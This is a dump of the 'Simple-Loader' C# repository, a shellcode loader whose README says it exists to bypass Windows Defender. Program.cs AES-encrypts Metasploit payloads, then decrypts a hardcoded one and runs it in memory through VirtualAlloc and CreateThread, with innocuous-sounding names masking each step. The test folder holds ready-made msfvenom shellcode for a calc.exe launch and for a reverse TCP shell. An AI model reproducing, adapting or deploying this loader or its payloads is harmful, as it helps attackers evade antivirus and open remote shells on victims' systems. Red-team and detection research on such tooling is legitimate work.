├── .gitattributes
├── .gitignore
├── README.md
├── Simple-Loader.sln
├── Simple-Loader
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Simple-Loader.csproj
├── atomic.ico
└── atomic.png
├── _config.yml
└── test
├── calc-payload.txt
└── reverse-tcp.txt
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | bld/
21 | [Bb]in/
22 | [Oo]bj/
23 | [Ll]og/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | project.fragment.lock.json
46 | artifacts/
47 |
48 | *_i.c
49 | *_p.c
50 | *_i.h
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.tmp_proj
65 | *.log
66 | *.vspscc
67 | *.vssscc
68 | .builds
69 | *.pidb
70 | *.svclog
71 | *.scc
72 |
73 | # Chutzpah Test files
74 | _Chutzpah*
75 |
76 | # Visual C++ cache files
77 | ipch/
78 | *.aps
79 | *.ncb
80 | *.opendb
81 | *.opensdf
82 | *.sdf
83 | *.cachefile
84 | *.VC.db
85 | *.VC.VC.opendb
86 |
87 | # Visual Studio profiler
88 | *.psess
89 | *.vsp
90 | *.vspx
91 | *.sap
92 |
93 | # TFS 2012 Local Workspace
94 | $tf/
95 |
96 | # Guidance Automation Toolkit
97 | *.gpState
98 |
99 | # ReSharper is a .NET coding add-in
100 | _ReSharper*/
101 | *.[Rr]e[Ss]harper
102 | *.DotSettings.user
103 |
104 | # JustCode is a .NET coding add-in
105 | .JustCode
106 |
107 | # TeamCity is a build add-in
108 | _TeamCity*
109 |
110 | # DotCover is a Code Coverage Tool
111 | *.dotCover
112 |
113 | # NCrunch
114 | _NCrunch_*
115 | .*crunch*.local.xml
116 | nCrunchTemp_*
117 |
118 | # MightyMoose
119 | *.mm.*
120 | AutoTest.Net/
121 |
122 | # Web workbench (sass)
123 | .sass-cache/
124 |
125 | # Installshield output folder
126 | [Ee]xpress/
127 |
128 | # DocProject is a documentation generator add-in
129 | DocProject/buildhelp/
130 | DocProject/Help/*.HxT
131 | DocProject/Help/*.HxC
132 | DocProject/Help/*.hhc
133 | DocProject/Help/*.hhk
134 | DocProject/Help/*.hhp
135 | DocProject/Help/Html2
136 | DocProject/Help/html
137 |
138 | # Click-Once directory
139 | publish/
140 |
141 | # Publish Web Output
142 | *.[Pp]ublish.xml
143 | *.azurePubxml
144 | # TODO: Comment the next line if you want to checkin your web deploy settings
145 | # but database connection strings (with potential passwords) will be unencrypted
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
150 | # checkin your Azure Web App publish settings, but sensitive information contained
151 | # in these scripts will be unencrypted
152 | PublishScripts/
153 |
154 | # NuGet Packages
155 | *.nupkg
156 | # The packages folder can be ignored because of Package Restore
157 | **/packages/*
158 | # except build/, which is used as an MSBuild target.
159 | !**/packages/build/
160 | # Uncomment if necessary however generally it will be regenerated when needed
161 | #!**/packages/repositories.config
162 | # NuGet v3's project.json files produces more ignoreable files
163 | *.nuget.props
164 | *.nuget.targets
165 |
166 | # Microsoft Azure Build Output
167 | csx/
168 | *.build.csdef
169 |
170 | # Microsoft Azure Emulator
171 | ecf/
172 | rcf/
173 |
174 | # Windows Store app package directories and files
175 | AppPackages/
176 | BundleArtifacts/
177 | Package.StoreAssociation.xml
178 | _pkginfo.txt
179 |
180 | # Visual Studio cache files
181 | # files ending in .cache can be ignored
182 | *.[Cc]ache
183 | # but keep track of directories ending in .cache
184 | !*.[Cc]ache/
185 |
186 | # Others
187 | ClientBin/
188 | ~$*
189 | *~
190 | *.dbmdl
191 | *.dbproj.schemaview
192 | *.jfm
193 | *.pfx
194 | *.publishsettings
195 | node_modules/
196 | orleans.codegen.cs
197 |
198 | # Since there are multiple workflows, uncomment next line to ignore bower_components
199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
200 | #bower_components/
201 |
202 | # RIA/Silverlight projects
203 | Generated_Code/
204 |
205 | # Backup & report files from converting an old project file
206 | # to a newer Visual Studio version. Backup files are not needed,
207 | # because we have git ;-)
208 | _UpgradeReport_Files/
209 | Backup*/
210 | UpgradeLog*.XML
211 | UpgradeLog*.htm
212 |
213 | # SQL Server files
214 | *.mdf
215 | *.ldf
216 |
217 | # Business Intelligence projects
218 | *.rdl.data
219 | *.bim.layout
220 | *.bim_*.settings
221 |
222 | # Microsoft Fakes
223 | FakesAssemblies/
224 |
225 | # GhostDoc plugin setting file
226 | *.GhostDoc.xml
227 |
228 | # Node.js Tools for Visual Studio
229 | .ntvs_analysis.dat
230 |
231 | # Visual Studio 6 build log
232 | *.plg
233 |
234 | # Visual Studio 6 workspace options file
235 | *.opt
236 |
237 | # Visual Studio LightSwitch build output
238 | **/*.HTMLClient/GeneratedArtifacts
239 | **/*.DesktopClient/GeneratedArtifacts
240 | **/*.DesktopClient/ModelManifest.xml
241 | **/*.Server/GeneratedArtifacts
242 | **/*.Server/ModelManifest.xml
243 | _Pvt_Extensions
244 |
245 | # Paket dependency manager
246 | .paket/paket.exe
247 | paket-files/
248 |
249 | # FAKE - F# Make
250 | .fake/
251 |
252 | # JetBrains Rider
253 | .idea/
254 | *.sln.iml
255 |
256 | # CodeRush
257 | .cr/
258 |
259 | # Python Tools for Visual Studio (PTVS)
260 | __pycache__/
261 | *.pyc
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
4 |
5 |
6 | # Simple-Loader
7 | An extendable Shell Code Loader to Bypass Windows Defender
8 |
9 |
10 | 
12 |
13 |
14 | ## Usage:
15 | See [This Post](https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/) for how to use.
16 |
17 | # Contact
18 |
19 | 
21 |
22 |
23 |
24 | 
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Simple-Loader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.572
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Simple-Loader", "Simple-Loader\Simple-Loader.csproj", "{035AE711-C0E9-41DA-A9A2-6523865E8694}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x86 = Debug|x86
12 | Release|Any CPU = Release|Any CPU
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|x86.ActiveCfg = Debug|x86
19 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|x86.Build.0 = Debug|x86
20 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|x86.ActiveCfg = Release|x86
23 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|x86.Build.0 = Release|x86
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {07CD72A7-4355-4C26-91E4-523CF64B2A67}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Simple-Loader/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Simple-Loader/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Runtime.InteropServices;
4 | using System.Security.Cryptography;
5 |
6 |
7 | /*-----------------------------------------------
8 | * Simple-Loader.exe: Simple Shellcode Loader |
9 | * |
10 | * Author: @jfaust0 |
11 | * Contact: joshua.faust@sevrosecurity.com |
12 | * Website: SevroSecurity.com |
13 | * ---------------------------------------------*/
14 |
15 |
16 | namespace goodTimes
17 | {
18 | class Program
19 | {
20 | // CHANGE THESE VALUES --> Seriosuly, these should not be hard coded!
21 | public static byte[] key = new byte[] { 0x33, 0xED, 0x8A, 0x15, 0xD9, 0x26, 0xC5, 0x1C, 0x95, 0xF1, 0x4C, 0x11, 0xE4, 0x37, 0xD4, 0x5B, 0xE8, 0xDD, 0x8E, 0xED, 0xDC, 0x01, 0x38, 0xC7 };
22 | public static byte[] iv = new byte[] { 0x2B, 0x6F, 0xD1, 0xE3, 0x59, 0x6F, 0xC3, 0x31, 0x62, 0xC9, 0x98, 0x55, 0x7B, 0x00, 0xCB, 0xD1 };
23 |
24 | // MAIN
25 | static void Main(string[] args)
26 | {
27 | String app_name = AppDomain.CurrentDomain.FriendlyName;
28 | String usage = $"Usage: {app_name} ";
29 |
30 | // ENCRYPT PAYLOAD
31 | if (args.Length == 1)
32 | {
33 | if (!File.Exists($@"{args[0]}"))
34 | {
35 | Console.WriteLine("[!] File Does Not Exist!");
36 | Environment.Exit(1);
37 | }
38 |
39 | Console.WriteLine("[i] Encrypting Data");
40 |
41 | // Read in MetaSploit Byte[] Code from File
42 | String fileData = System.IO.File.ReadAllText($@"{args[0]}");
43 | String tmp = (fileData.Split('{')[1]).Split('}')[0];
44 |
45 | // Translate to Byte Array
46 | string[] s = tmp.Split(',');
47 | byte[] data = new byte[s.Length];
48 | for (int i = 0; i < data.Length; i++)
49 | data[i] = byte.Parse(s[i].Replace("0x", ""), System.Globalization.NumberStyles.HexNumber);
50 |
51 | // Encrypt and Encode the data:
52 | byte[] e_data = Encrypt(data, key, iv);
53 | String finalPayload = Convert.ToBase64String(e_data);
54 | Console.WriteLine($"[i] Replace the hiphop variable with your new payload:\n\n\t String hiphop = " + '"' + $"{finalPayload}" + '"' + ';');
55 |
56 | Environment.Exit(0);
57 | }
58 | // THROW EXCEPTION IF MORE THAN 1 ARG
59 | else if (args.Length > 1)
60 | {
61 | Console.WriteLine(usage);
62 | Environment.Exit(1);
63 | }
64 | // RUN PAYLOAD
65 | else
66 | {
67 | // msfvenom -p windows/exe cmd=calc.exe -f csharp --> CHANGE ME!
68 | String hiphop = "ZxOy1BksVfrlq8wcmyHY8GwwiBZd8NGrGQiKvx15hcv9sQ9apoO6NGbNBxAeS4NLHSz4owcdPgQTTejYJr80Ke4ynoy41yrc5RD0uqt1ppyxDAeYGATQy7xFbN247gwFee5cPZAFyBzbI6DvOLBFSJiP64kv5T7pX3iapVsX7ORmg7Ubfa1M9PcYNm5qzS9dyHxFdeD578YA6DGYC0UPzmeDXB11R0MWmPAkRGFftQp + YdurMHce1R4HC9bQ0gtm / MLHIP / UTPbIUtwrEAqQ / SYJcJCmeCPynYLNYrn9ae1xvCBokUTgdK + gpUa58ss2F4F60p1ujZNHmQ1Bn39WZmK5R4wSVmdFJpKRZXeGycAziEVlGjsS7XDKsvQvWvaZKqealuTWxH9q6n++zrRJZ0TBorjcFHKJZOLK5bNgKx0DbmFHXz + KBH400o";
69 |
70 | byte[] de_data = Decrypt(Convert.FromBase64String(hiphop), key, iv);
71 | nonsense(de_data);
72 | }
73 |
74 | }
75 |
76 | // Shell Code Loader
77 | public static bool nonsense(byte[] shellcode)
78 | {
79 |
80 | try
81 | {
82 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
83 | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
84 | Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
85 | IntPtr hThread = IntPtr.Zero;
86 | UInt32 threadId = 0;
87 | IntPtr pinfo = IntPtr.Zero;
88 |
89 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
90 | WaitForSingleObject(hThread, 0xFFFFFFFF);
91 |
92 | return true;
93 | }
94 | catch (Exception e)
95 | {
96 | Console.Error.WriteLine("exception: " + e.Message);
97 | return false;
98 | }
99 | }
100 |
101 | // Used to Load Shellcode into Memory:
102 | private static UInt32 MEM_COMMIT = 0x1000;
103 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
104 |
105 | [DllImport("kernel32")]
106 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
107 | UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
108 |
109 | [DllImport("kernel32")]
110 | private static extern IntPtr CreateThread(
111 | UInt32 lpThreadAttributes,
112 | UInt32 dwStackSize,
113 | UInt32 lpStartAddress,
114 | IntPtr param,
115 | UInt32 dwCreationFlags,
116 | ref UInt32 lpThreadId
117 | );
118 |
119 | [DllImport("kernel32")]
120 | private static extern UInt32 WaitForSingleObject(
121 | IntPtr hHandle,
122 | UInt32 dwMilliseconds
123 | );
124 |
125 |
126 | public static byte[] Encrypt(byte[] data, byte[] key, byte[] iv)
127 | {
128 | using (var aes = Aes.Create())
129 | {
130 | aes.KeySize = 256;
131 | aes.BlockSize = 128;
132 | aes.Padding = PaddingMode.Zeros;
133 |
134 | aes.Key = key;
135 | aes.IV = iv;
136 |
137 | using (var encryptor = aes.CreateEncryptor(aes.Key, aes.IV))
138 | {
139 | return PerformCryptography(data, encryptor);
140 | }
141 | }
142 | }
143 |
144 | public static byte[] Decrypt(byte[] data, byte[] key, byte[] iv)
145 | {
146 | using (var aes = Aes.Create())
147 | {
148 | aes.KeySize = 256;
149 | aes.BlockSize = 128;
150 | aes.Padding = PaddingMode.Zeros;
151 |
152 | aes.Key = key;
153 | aes.IV = iv;
154 |
155 | using (var decryptor = aes.CreateDecryptor(aes.Key, aes.IV))
156 | {
157 | return PerformCryptography(data, decryptor);
158 | }
159 | }
160 | }
161 |
162 | private static byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform)
163 | {
164 | using (var ms = new MemoryStream())
165 | using (var cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write))
166 | {
167 | cryptoStream.Write(data, 0, data.Length);
168 | cryptoStream.FlushFinalBlock();
169 |
170 | return ms.ToArray();
171 | }
172 | }
173 |
174 | }
175 | }
176 |
--------------------------------------------------------------------------------
/Simple-Loader/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Good Times")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Good Times")]
13 | [assembly: AssemblyCopyright("Copyright © 2019")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("035ae711-c0e9-41da-a9a2-6523865e8694")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Simple-Loader/Simple-Loader.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {035AE711-C0E9-41DA-A9A2-6523865E8694}
8 | Exe
9 | Simple_Loader
10 | Simple-Loader
11 | v4.6.1
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x86\Debug\
38 | DEBUG;TRACE
39 | full
40 | x86
41 | prompt
42 | MinimumRecommendedRules.ruleset
43 | true
44 |
45 |
46 | bin\x86\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x86
51 | prompt
52 | MinimumRecommendedRules.ruleset
53 | true
54 |
55 |
56 | atomic.ico
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
--------------------------------------------------------------------------------
/Simple-Loader/atomic.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joshfaust/Simple-Loader/44237f57e62dd343db3e3fc8056a1ae2cb9869d8/Simple-Loader/atomic.ico
--------------------------------------------------------------------------------
/Simple-Loader/atomic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joshfaust/Simple-Loader/44237f57e62dd343db3e3fc8056a1ae2cb9869d8/Simple-Loader/atomic.png
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | theme: jekyll-theme-midnight
--------------------------------------------------------------------------------
/test/calc-payload.txt:
--------------------------------------------------------------------------------
1 | byte[] buf = new byte[274] {
2 | 0xdb,0xd7,0xb8,0x80,0x35,0xcc,0xa2,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,
3 | 0x3e,0x31,0x46,0x1a,0x83,0xc6,0x04,0x03,0x46,0x16,0xe2,0x75,0x8d,0x7e,0xcb,
4 | 0x39,0x1f,0xa4,0xc6,0x18,0xab,0x7d,0x23,0xc1,0x7d,0xb7,0x7a,0xcd,0xfe,0x84,
5 | 0x79,0x1c,0x42,0x05,0x81,0xaf,0x23,0xb7,0x81,0x00,0x7b,0xec,0x59,0xb9,0x41,
6 | 0x00,0x9e,0x86,0x92,0xe8,0x8b,0x92,0xc3,0xb6,0xaf,0x4f,0x4e,0x8a,0xb4,0xd7,
7 | 0x94,0xdd,0xfb,0x21,0x78,0xdb,0x20,0xe7,0xd1,0xcb,0x68,0x29,0x45,0x70,0x40,
8 | 0xb6,0xdc,0x6e,0xde,0x4e,0x30,0x9c,0xc8,0x27,0x64,0x44,0x65,0x2c,0x2b,0x8b,
9 | 0xab,0x5a,0x12,0x98,0xe8,0xd0,0x76,0xef,0xd3,0x10,0xa8,0x37,0x36,0x37,0x36,
10 | 0x6c,0xbc,0x98,0x45,0xf6,0xcb,0x70,0xa4,0xc6,0xd1,0x2a,0x98,0xf1,0xfb,0x78,
11 | 0x96,0x7c,0xe3,0x0a,0x24,0x97,0x64,0xdb,0x22,0xd9,0xa7,0x42,0x2f,0xa8,0x49,
12 | 0xc4,0x1b,0x81,0xbe,0x37,0x26,0x03,0xf6,0x1c,0x6c,0xd4,0x42,0x1c,0xd7,0x35,
13 | 0x5f,0x11,0xb9,0x49,0x82,0xa2,0x73,0xac,0x24,0xce,0xf1,0xf9,0xec,0xfb,0x18,
14 | 0xd8,0xb6,0x9e,0xce,0x4a,0xfa,0xeb,0x8b,0xb9,0xeb,0xe2,0xd8,0x43,0x7c,0x9f,
15 | 0x14,0xad,0x25,0x23,0xbd,0xed,0x65,0x0d,0x82,0x2a,0x45,0x57,0x4e,0x18,0x36,
16 | 0x0a,0x8c,0xfa,0xb2,0xa4,0xb7,0x63,0x93,0x49,0x1d,0x6a,0xb0,0x4d,0xc3,0x8d,
17 | 0x9b,0x32,0x05,0x8b,0xf5,0x5d,0xc5,0xb4,0x37,0xdb,0xc0,0x46,0xdb,0xa6,0x77,
18 | 0x73,0xc8,0xc1,0x8d,0x40,0x08,0xe2,0xdf,0x8e,0x39,0x6d,0x6e,0xb6,0xb1,0x7f,
19 | 0x87,0x88,0xd5,0xbe,0xac,0x97,0x7f,0x1b,0x5e,0xa8,0x04,0xc5,0xec,0x41,0x59,
20 | 0x39,0xa3,0x60,0xe9 };
--------------------------------------------------------------------------------
/test/reverse-tcp.txt:
--------------------------------------------------------------------------------
1 | byte[] buf = new byte[324] {
2 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
3 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
4 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
5 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
6 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
7 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
8 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
9 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
10 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
11 | 0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
12 | 0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
13 | 0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,
14 | 0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0xcc,0x68,
15 | 0x02,0x00,0x00,0x50,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
16 | 0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,
17 | 0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,
18 | 0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,0x3c,0x01,0x01,0x8d,0x44,
19 | 0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,
20 | 0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,
21 | 0x30,0x68,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,
22 | 0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
23 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 };
24 |
--------------------------------------------------------------------------------